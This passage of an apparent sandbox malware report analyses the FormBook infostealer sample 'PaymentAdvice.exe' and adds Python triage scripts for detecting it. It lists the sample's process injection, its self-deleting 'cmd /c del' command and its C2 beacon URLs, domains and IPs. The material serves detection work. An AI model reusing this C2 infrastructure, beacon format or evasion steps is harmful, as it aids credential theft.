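# ("...explorer.exeDomain query: ..."), so the parser splits on the first ".exe".
REPORT_LINES = [
    r"Source: C:\Windows\explorer.exeDomain query: www.plataformaporelmarcanario.com",
    r"Source: C:\Windows\explorer.exeNetwork Connect: 108.167.140.96 80",
    r"Source: C:\Windows\explorer.exeNetwork Connect: 81.19.159.73 80",
    r"Source: C:\Users\user\Desktop\PaymentAdvice.exeThread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Users\user\Desktop\PaymentAdvice.exeThread register set: target process: 3472",
    r"Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3472",
    r"Source: C:\Users\user\Desktop\PaymentAdvice.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B00000",
    r"Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess created: C:\Users\user\Desktop\PaymentAdvice.exe 'C:\Users\user\Desktop\PaymentAdvice.exe'",
    r"Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PaymentAdvice.exe'",
]

# "<process path ending in .exe><Event name>: <detail>": the event name starts with a
# capital letter and contains only letters and spaces, which is what separates it
# from the path it is glued to.
LINE_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)(?P<event>[A-Z][A-Za-z ]*?): (?P<detail>.*)$")
SELF_DELETE_RE = re.compile(r"cmd\.exe /c del '(?P<path>[^']+)'", re.IGNORECASE)
INJECTION_EVENTS = ("Thread APC queued", "Thread register set", "Section unmapped")


def parse_line(line):
    """Split one report line into (source process, event, detail), or None."""
    m = LINE_RE.match(line)
    return (m.group("proc"), m.group("event"), m.group("detail")) if m else None


def is_windows_system_binary(path):
    """explorer.exe, msiexec.exe and cmd.exe live under C:\\Windows; the lure does not."""
    return path.lower().startswith("c:\\windows\\")


def injection_target(detail):
    """Pull the target out of 'target process: X' or '<path> base address: ...'."""
    return detail.split("target process:")[-1].split(" base address:")[0].strip()


def triage(lines):
    net = defaultdict(lambda: {"domains": [], "ips": []})
    injections = []
    self_delete = []
    seen_sources = set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, event, detail = parsed
        seen_sources.add(proc.lower())
        if event == "Domain query" and is_windows_system_binary(proc):
            net[proc]["domains"].append(detail.strip())
        elif event == "Network Connect" and is_windows_system_binary(proc):
            net[proc]["ips"].append(detail.split()[0])  # detail is "<ip> <port>"
        elif event in INJECTION_EVENTS:
            injections.append((proc, injection_target(detail), event))
        elif event == "Process created":
            m = SELF_DELETE_RE.search(detail)
            # Only deleting a path that already ran as a process counts as self-deletion.
            if m and m.group("path").lower() in seen_sources:
                self_delete.append((proc, m.group("path")))
    return {
        "system_process_network": dict(net),
        "injections": injections,
        "self_delete": self_delete,
    }


if __name__ == "__main__":
    print(json.dumps(triage(REPORT_LINES), indent=2))
```

The same three rules transfer to live telemetry: Sysmon event 3/22 from explorer.exe to a long tail of port-80 hosts, event 8/10 with a source outside C:\Windows and a target inside it, and event 1 for cmd.exe whose command line deletes the image path of an earlier event 1.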

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook (the same matches as under Stealing of Sensitive Information; the report lists them under both categories)
Source: Yara match | File source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The report renders this as a 14-column matrix (one column per tactic); it is listed here by tactic. A number in parentheses after a technique is the report's superscript count of matched signatures for that technique, reproduced as extracted; where several superscripts were run together the digits appear concatenated (e.g. "612"). Techniques without a number are the matrix's unmatched cells.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Native API (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection (612); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Virtualization/Sandbox Evasion (3); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (11); DLL Side-Loading (1)
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (141); Virtualization/Sandbox Evasion (3); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Input Capture (1); Archive Collected Data (1); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data

Behavior Graph

Behavior Graph ID: 383926 | Sample: PaymentAdvice.exe | Start date: 08/04/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
Sample-level DNS/IP nodes: www.weatherdekniagara.com; www.vtz6whu5254xb1.xyz

Process tree, reconstructed from the graph's node and edge text (the graph image itself is not reproduced; bracketed numbers are the graph's per-node counters of created files / registry values):

PaymentAdvice.exe [18] (started)
    dropped: C:\Users\user\AppData\Local\...\ic4muy4.dll, PE32
    signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
    - PaymentAdvice.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        - explorer.exe (injected)
            network: www.brandschutzglas.com 81.19.159.73, local port 49732 -> 80, WORLD4YOUAT, Austria; hispanicalinguablog.com 108.167.140.96, local port 49733 -> 80, UNIFIEDLAYER-AS-1, United States; 13 other IPs or domains
            signatures: System process connects to network (likely due to code injection or exploit)
            - msiexec.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                - cmd.exe [1] (started)
                    - conhost.exe (started)

          Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
PaymentAdvice.exe | 33% | Virustotal | -
PaymentAdvice.exe | 25% | ReversingLabs | Win32.Spyware.Noon
PaymentAdvice.exe | 100% | Joe Sandbox ML | -

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
2.2.PaymentAdvice.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.msiexec.exe.95a558.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.2.msiexec.exe.4b47960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.1.PaymentAdvice.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.PaymentAdvice.exe.2680000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.saturnkorp.net/c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m | 100% | Avira URL Cloud | malware
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.dajiangzhibo12.com/c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m | 0% | Avira URL Cloud | safe
http://www.puebloregentseniorliving.com/c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.hispanicalinguablog.com/c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m | 0% | Avira URL Cloud | safe
http://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m | 100% | Avira URL Cloud | malware
http://www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.unmanglement.com/c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.webinast.com/c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.brandschutzglas.com/c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.plataformaporelmarcanario.com/c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
www.saturnkorp.net/c22b/ | 100% | Avira URL Cloud | malware
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Two things to read into this table. First, the 0% / safe verdicts on most of the /c22b/ URLs reflect scanner coverage at analysis time, not benign traffic: every /c22b/ URL carries the same query layout and the same trailing token (ary=tXLpzhFpgBj4m) and was requested by the injected explorer.exe, so all of them belong to the FormBook configuration regardless of the per-URL rating. Second, the bare vendor URLs (founder.com.cn, tiro.com, goodfont.co.kr, carterandcone.com, sajatypeworks.com, typography.net, galapagosdesign.com, fontfabrik.com, jiyu-kobo.co.jp, sandoll.co.kr, urwpp.de, zhongyicts.com.cn, sakkal.com) are font-foundry strings from Windows font metadata found in process memory, not contacted hosts; the stray characters at their ends (coml, netD, bThe, DPlease) are where the string extractor ran into the neighbouring bytes.
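As an added example (my code, not the report's or any vendor's tooling): Python that pulls the campaign identifiers out of the beacon URLs above and separates them from the font-vendor noise. The shape test encodes what the ten /c22b/ URLs on this page have in common (one short path segment, exactly two query parameters, a long base64 blob, and a short token identical across all hosts); treating that shape as the general FormBook beacon layout is my assumption, as are the length thresholds in the regexes. The URLs in SAMPLE_URLS are copied from the table above.

```python
import base64
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Three beacon URLs and two of the font-vendor strings, copied from the URL table above.
SAMPLE_URLS = [
    "http://www.saturnkorp.net/c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m",
    "http://www.dajiangzhibo12.com/c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m",
    "http://www.brandschutzglas.com/c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m",
    "http://www.galapagosdesign.com/staff/dennis.htm",
    "http://www.founder.com.cn/cn/bThe",
]

# Beacon shape (assumption, generalised from the /c22b/ URLs on this page): a path of
# exactly one short alphanumeric segment, then exactly two query parameters, the first
# a long base64 blob and the second a short token that is constant across the campaign.
PATH_RE = re.compile(r"^/[0-9a-z]{3,8}/$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{8,24}$")


def split_query(query):
    """Split 'a=1&b=2' without decoding: parse_qsl would turn the base64 '+' into spaces."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((key, value))
    return pairs


def classify(url):
    """Return the beacon fields for a FormBook-shaped URL, or None for anything else."""
    parts = urlsplit(url)
    params = split_query(parts.query)
    if not PATH_RE.match(parts.path) or len(params) != 2:
        return None
    (blob_key, blob), (token_key, token) = params
    if not (BLOB_RE.match(blob) and TOKEN_RE.match(token)):
        return None
    # Re-pad in case the encoder dropped the '=' padding; the content stays encrypted,
    # only its length is used here.
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return {
        "host": parts.hostname,
        "path": parts.path,
        "blob_param": blob_key,
        "blob_len": len(raw),
        "token_param": token_key,
        "token": token,
    }


def cluster(urls):
    """Group beacon hosts by (path, token): one cluster is one campaign configuration."""
    groups = defaultdict(list)
    for url in urls:
        hit = classify(url)
        if hit is not None:
            groups[(hit["path"], hit["token"])].append(hit["host"])
    return dict(groups)


if __name__ == "__main__":
    for (path, token), hosts in cluster(SAMPLE_URLS).items():
        print(f"{path} token={token}: {len(hosts)} hosts")
        for host in hosts:
            print("   ", host)
```

The cluster key (path plus the shared token) is what to pivot on: every host that carries /c22b/ with ary=tXLpzhFpgBj4m belongs to the same configuration, including the ones Avira URL Cloud rated safe. The decoded blob is 51 bytes for each beacon here, which is a usable feature on its own; its content is encrypted and this example makes no attempt to decrypt it.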

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.plataformaporelmarcanario.com | 52.142.208.184 | true | true | - | unknown
hispanicalinguablog.com | 108.167.140.96 | true | true | - | unknown
www.weatherdekniagara.com | 154.90.117.58 | true | true | - | unknown
www.sgdivergence.com | 199.59.242.153 | true | true | - | unknown
www.saturnkorp.net | 75.126.101.233 | true | true | - | unknown
www.abolishlawinforcement.com | 66.96.162.131 | true | true | - | unknown
www.dajiangzhibo12.com | 104.21.85.234 | true | true | - | unknown
webinast.com | 35.214.93.182 | true | true | - | unknown
puebloregentseniorliving.com | 184.168.131.241 | true | true | - | unknown
www.brandschutzglas.com | 81.19.159.73 | true | true | - | unknown
unmanglement.com | 34.102.136.180 | true | false | - | unknown
www.vtz6whu5254xb1.xyz | 49.156.179.238 | true | true | - | unknown
www.unmanglement.com | unknown | unknown | true | - | unknown
www.hispanicalinguablog.com | unknown | unknown | true | - | unknown
www.webinast.com | unknown | unknown | true | - | unknown
www.puebloregentseniorliving.com | unknown | unknown | true | - | unknown
www.anchor-little.com | unknown | unknown | true | - | unknown

The www. names listed with no IP are the names the injected explorer.exe actually queried (see the Domain query lines above); the matching bare-domain rows carry the address the query ended at, most likely because the www. name is an alias (CNAME) of the bare domain. For blocking, take both forms. www.anchor-little.com was queried but never resolved to an address in this run.

                                            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.saturnkorp.net/c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m | true | Avira URL Cloud: malware | unknown
http://www.dajiangzhibo12.com/c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m | true | Avira URL Cloud: safe | unknown
http://www.puebloregentseniorliving.com/c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m | true | Avira URL Cloud: safe | unknown
http://www.hispanicalinguablog.com/c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m | true | Avira URL Cloud: safe | unknown
http://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m | true | Avira URL Cloud: malware | unknown
http://www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m | true | Avira URL Cloud: safe | unknown
http://www.unmanglement.com/c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m | false | Avira URL Cloud: safe | unknown
http://www.webinast.com/c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m | true | Avira URL Cloud: safe | unknown
http://www.brandschutzglas.com/c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m | true | Avira URL Cloud: safe | unknown
http://www.plataformaporelmarcanario.com/c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m | true | Avira URL Cloud: safe | unknown
www.saturnkorp.net/c22b/ | true | Avira URL Cloud: malware | low

                                            URLs from Memory and Binaries

Source for every row below: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp

Name | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | false | | high
http://www.fontbureau.com | false | | high
http://www.fontbureau.com/designersG | false | | high
http://www.fontbureau.com/designers/? | false | | high
http://www.founder.com.cn/cn/bThe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | false | | high
http://www.tiro.com | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | false | | high
http://www.goodfont.co.kr | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | false | URL Reputation: safe | unknown
http://www.typography.netD | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | false | | high
http://www.founder.com.cn/cn/cThe | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | false | URL Reputation: safe | unknown
http://fontfabrik.com | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | false | | high
http://www.jiyu-kobo.co.jp/ | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | false | | high
http://www.fonts.com | false | | high
http://www.sandoll.co.kr | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | false | URL Reputation: safe | unknown
http://www.sakkal.com | false | URL Reputation: safe | unknown

                                                                Contacted IPs

                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.153 | www.sgdivergence.com | United States | 395082 | BODIS-NJUS | true
35.214.93.182 | webinast.com | United States | 19527 | GOOGLE-2US | true
81.19.159.73 | www.brandschutzglas.com | Austria | 38955 | WORLD4YOUAT | true
52.142.208.184 | www.plataformaporelmarcanario.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
75.126.101.233 | www.saturnkorp.net | United States | 36351 | SOFTLAYERUS | true
104.21.85.234 | www.dajiangzhibo12.com | United States | 13335 | CLOUDFLARENETUS | true
108.167.140.96 | hispanicalinguablog.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
34.102.136.180 | unmanglement.com | United States | 15169 | GOOGLEUS | false
66.96.162.131 | www.abolishlawinforcement.com | United States | 29873 | BIZLAND-SDUS | true
184.168.131.241 | puebloregentseniorliving.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

                                                                General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383926
Start date: 08.04.2021
Start time: 12:37:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 52s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PaymentAdvice.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@13/10
EGA Information: Failed
HDC Information:
• Successful, ratio: 20.4% (good quality ratio 18.6%)
• Quality average: 75%
• Quality standard deviation: 31.3%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.88.21.125, 168.61.161.212, 104.43.193.48, 95.100.54.203, 20.82.209.183, 40.88.32.150, 23.10.249.26, 23.10.249.43, 23.0.174.185, 23.0.174.200, 20.54.26.129, 20.82.210.154
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

Match | Associated Sample Name / URL | Detection | Context
199.59.242.153 | 0BAdCQQVtP.exe | malicious | www.mybodtonheart.com/bei3/?8p=EZa0cv&2d=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzOxundmeb0pk/R87Q==
 | RFQ_ V-21-Kiel-050-D02.xlsx | malicious | www.krishnagiri.info/nsag/?MDK0g=hPHybZPWty89zdC7zz6D1Y5bPXZXETq0TT3iYhuvTaEiGqMWh7BB5kcULROPrIgmxQ/f1w==&UB=hR-4brtxaT5D4f3
 | New Order.exe | malicious | www.friendsed.com/ditf/?KvZpwPd=7CjyIVchQZXwoSp1jc0tC17NVLbOMlIdjZlIPcHCPGe34LEeqGe9fWkqZA8O62TU4Lu3&ARn=BjAtCdjxOrQ8pTgP
 | ALPHA SCIENCE, INC.exe | malicious | www.simplyhealrhcareplans.com/sqra/?Rl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK&_jqT2L=gBg8BF3ptlc
 | payment.exe | malicious | www.mybodtonheart.com/bei3/?M4YDYvh=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzCIiGxmJdo4&Rl=M48tiJch
 | Order.exe | malicious | www.getbacklink.net/cugi/?BlL=15D5Rlw69THVEJtjRVEnjixvCWz0IM/dTd5neGnMhVDDO36KfpjGt1+SA4NLCUy6JvG/&EZXpx6=tXExBh8PdJwpH
 | PaymentInvoice.exe | malicious | www.sgdivergence.com/c22b/?9rgH70GX=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&LL0=X4XDHNl0z
 | SB210330034.pdf.exe | malicious | www.tollisenschool.com/g7b/?8p=chLXzryXh&tL30J=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBtE+arhNut
 | swift_76567643.exe | malicious | www.hicapitolize.com/m8es/?CVJ=sG6ecfng0YvqxX6BTfb7C0qDagoY2GDrv6xqwretuMrKP6q0Q4gvq6Z0725wPxuv0KtT&oX9=Txo8ntB0WBsp
 | Request an Estimate_2021_04_01.exe | malicious | www.tollisenschool.com/g7b/?RzulnV=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBHbOqrlPmt&QL3=tTypTNm0gPD0F
